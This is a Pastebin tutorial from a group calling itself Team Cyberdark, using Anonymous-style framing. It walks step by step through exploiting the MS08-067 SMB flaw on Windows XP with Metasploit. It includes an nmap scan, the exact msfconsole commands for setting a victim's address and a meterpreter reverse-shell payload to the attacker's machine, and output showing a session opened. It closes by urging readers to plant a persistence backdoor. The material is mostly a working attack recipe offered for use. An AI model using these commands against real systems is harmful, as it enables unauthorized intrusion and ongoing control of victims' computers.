API tools faq
paste
CyberdarkKh

Exploit Windows xp by IP on Kali Linux

CyberdarkKh
May 29th, 2015
1,158
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.70 KB | None | 0 0
raw download clone embed print report
  1. #############################################################
  2. ### #Team Cyberdark ( #Operation Freedom Tutorial ) ###
  3. #############################################################
  4.  
  5.  
  6.  
  7. +-------------------------------------------+
  8. Video [ #Anonymous - Exploit Windows ] -> + Exploit Windows xp on Kali Linux by IP +
  9. +-------------------------------------------+
  10.  
  11.  
  12. History of MS08-067
  13. ======================================================================================================================
  14. MS08-067: Vulnerability in Server Service Could Allow Remote Code Execution (958644)
  15. Severity CVSS Published Added Modified
  16. 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) October 22, 2008 October 22, 2008 February 12, 2015
  17. ======================================================================================================================
  18.  
  19.  
  20.  
  21. ======================================================================================================================
  22. Using metasploit its possible to hack windows xp machines just by using the ip address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in windows samba service called ms08-67. This exploit works on windows xp upto version xp sp3.
  23.  
  24. Further details and references to the vulnerability can be found at the following pages
  25.  
  26. http://cvedetails.com/cve/2008-4250/
  27. http://www.osvdb.org/49243
  28. http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
  29. http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
  30.  
  31. ==================================================================================================================
  32. Note : This exploit is old as of now and will work only if the windows xp on the target machine is unpatched and not running any firewalls. If you were to scan a range of ip addresses to discover online windows xp machines, then most of them would likely be patched ( through automatic updates ).
  33. ====================================================================================================================
  34.  
  35. So if you want to test and practise this exploit, setup a vulnerable unpatched xp system.
  36. Scan for open ports
  37.  
  38. Before exploiting the xp machine with metasploit it is a good idea to scan for open ports using nmap to confirm that ports are accessible and accepting connections. Here is a quick example
  39.  
  40. root@cyberdark:~# nmap -n -sV 192.168.1.4
  41.  
  42. Starting Nmap 6.25 ( http://nmap.org ) at 2013-05-03 06:27 PDT
  43. Nmap scan report for 192.168.1.4
  44. Host is up (0.00051s latency).
  45. Not shown: 996 closed ports
  46. PORT STATE SERVICE VERSION
  47. 135/tcp open msrpc Microsoft Windows RPC
  48. 139/tcp open netbios-ssn
  49. 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
  50. 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
  51. MAC Address: 08:00:27:D3:2C:37 (Cadmus Computer Systems)
  52. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  53.  
  54. Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  55. Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds
  56.  
  57. Check the port number 445. It is running the microsoft-ds samba service. This service is used to share printers and files across the network. It is this service that is vulnerable to the above mentioned exploit and would be hacked next using metasploit.
  58. =========================================================================================================================
  59. Exploit using metasploit
  60.  
  61. 1. The exploit is quite easy to launch. Start msfconsole.
  62.  
  63. Using notepad to track pentests? Have Metasploit Pro report on hosts,
  64. services, sessions and evidence -- type 'go_pro' to launch it now.
  65.  
  66. =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
  67. + -- --=[ 1059 exploits - 595 auxiliary - 175 post
  68. + -- --=[ 277 payloads - 29 encoders - 8 nops
  69.  
  70. msf >
  71.  
  72. 2. Select the exploit with 'use' command.
  73.  
  74. msf > use exploit/windows/smb/ms08_067_netapi
  75. msf exploit(ms08_067_netapi) >
  76.  
  77. If you want to read information about the exploit then type 'info' and hit enter.
  78.  
  79. 3. See the options available
  80.  
  81. msf exploit(ms08_067_netapi) > show options
  82.  
  83. Module options (exploit/windows/smb/ms08_067_netapi):
  84.  
  85. Name Current Setting Required Description
  86. ---- --------------- -------- -----------
  87. RHOST yes The target address
  88. RPORT 445 yes Set the SMB service port
  89. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
  90.  
  91.  
  92. Exploit target:
  93.  
  94. Id Name
  95. -- ----
  96. 0 Automatic Targeting
  97.  
  98.  
  99. msf exploit(ms08_067_netapi) >
  100.  
  101. The important option to set is the RHOST (Remote Host). This is the ip address of the victim machine that is running the vulnerable windows xp. In this example the ip address is 192.168.1.4
  102. So set the option
  103.  
  104. msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
  105. RHOST => 192.168.1.4
  106. msf exploit(ms08_067_netapi) >
  107.  
  108. 4. Select the payload
  109.  
  110. Next comes the payload. Payload is that piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the windows meterpreter payload. If you want to see all the available payloads then use the 'show payloads' command.
  111.  
  112. msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
  113. payload => windows/meterpreter/reverse_tcp
  114.  
  115. Why meterpreter ? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post exploitation tasks like scanning the target's network, hardware, accessing devices etc. Meterpreter can also start a vnc session.
  116.  
  117. 5. Check options once again
  118.  
  119. Now that we have selected out payload, its time to check the options once again.
  120.  
  121. msf exploit(ms08_067_netapi) > show options
  122.  
  123. Module options (exploit/windows/smb/ms08_067_netapi):
  124.  
  125. Name Current Setting Required Description
  126. ---- --------------- -------- -----------
  127. RHOST 192.168.1.4 yes The target address
  128. RPORT 445 yes Set the SMB service port
  129. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
  130.  
  131.  
  132. Payload options (windows/meterpreter/reverse_tcp):
  133.  
  134. Name Current Setting Required Description
  135. ---- --------------- -------- -----------
  136. EXITFUNC thread yes Exit technique: seh, thread, process, none
  137. LHOST yes The listen address
  138. LPORT 4444 yes The listen port
  139.  
  140.  
  141. Exploit target:
  142.  
  143. Id Name
  144. -- ----
  145. 0 Automatic Targeting
  146.  
  147.  
  148. msf exploit(ms08_067_netapi) >
  149.  
  150. Now the options also include the payload options. The important options to set are LHOST and LPORT. The LHOST is the ip address of local machine or hacker machine. The LPORT is the port number on which the reverse shell listener will receive the incoming shell.
  151.  
  152. So setup the correct values
  153.  
  154. msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33
  155. LHOST => 192.168.1.33
  156. msf exploit(ms08_067_netapi) > set LPORT 6666
  157. LPORT => 6666
  158. msf exploit(ms08_067_netapi) >
  159.  
  160. 6. Launch the exploit
  161.  
  162. Now metasploit is all configured to launch the exploit. Enter 'exploit' and hit enter.
  163.  
  164. msf exploit(ms08_067_netapi) > exploit
  165.  
  166. [*] Started reverse handler on 192.168.1.33:6666
  167. [*] Automatically detecting the target...
  168. [*] Fingerprint: Windows XP - Service Pack 3 - lang:English
  169. [*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
  170. [*] Attempting to trigger the vulnerability...
  171. [*] Sending stage (752128 bytes) to 192.168.1.4
  172. [*] Meterpreter session 2 opened (192.168.1.33:6666 -> 192.168.1.4:1044) at 2013-05-03 03:27:25 -0700
  173.  
  174. meterpreter >
  175.  
  176.  
  177. After successfully exploit windows is important Persistence
  178.  
  179. How to Create a Persistence Backdoor after exploit in windows OS using Metasploit and why need Persistence after exploit windows victim
  180.  
  181. Previous posts i explained how to exploit and gain access in window OS , after gaining access its important to create a backdoor to exploit again.
  182.  
  183.  
  184.  
  185. If you have succeed to exploit a system you may consider to place a back-door in order to connect again easily with your target.For example if the user decides to install a patch or to remove the vulnerable service in his system then you will need to figure out an alternative way for getting again access to the remote system.That’ss why back-doors are important because they can maintain access to a system that you have compromised.
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!